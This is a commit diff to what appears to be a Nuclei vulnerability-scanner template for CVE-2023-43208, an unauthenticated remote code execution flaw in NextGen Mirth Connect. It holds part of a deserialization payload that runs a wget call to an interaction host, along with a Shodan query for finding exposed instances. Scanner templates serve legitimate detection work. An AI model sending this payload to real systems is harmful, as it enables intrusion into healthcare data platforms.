Update CVE-2023-43208.yaml

2023-10-25 23:43:45 +05:30 · 2023-10-25 23:43:45 +05:30 · d8b65a0338
parent 833c47ce41
commit d8b65a0338
1 changed files with 23 additions and 13 deletions
--- a/http/cves/2023/CVE-2023-43208.yaml
+++ b/http/cves/2023/CVE-2023-43208.yaml
@ -1,12 +1,20 @@
 id: CVE-2023-43208
+
 info:
-  name: NextGen Mirth Connect - Remote Code Execution Vulnerability
+  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
+  classification:
+    cve-id: CVE-2023-43208
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: title:"mirth connect administrator"
+  tags: cve,cve2023,nextgen,rce

 http:
  - raw:
@ -28,7 +36,7 @@ http:
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
-                            <string>curl</string>
+                            <string>wget</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
@ -37,17 +45,19 @@ http:
            </dynamic-proxy>
        </sorted-set>

-    extractors:
-      - type: regex
-        part: body_1
-        internal: true
-        name: detected_version
-        group: 1
-        regex:
-          - '(.*)'
-
-    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
-          - 'compare_versions(detected_version, "<4.4.1") && contains(interactsh_protocol, "dns") && status_code_1 == 200 && status_code_2 == 500'
+          - 'compare_versions(version, "<4.4.1")'
+          - 'contains(interactsh_protocol, "dns")'
+          - 'status_code_1 == 200 && status_code_2 == 500'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body_1
+        name: version
+        group: 1
+        regex:
+          - '(.*)'
+        internal: true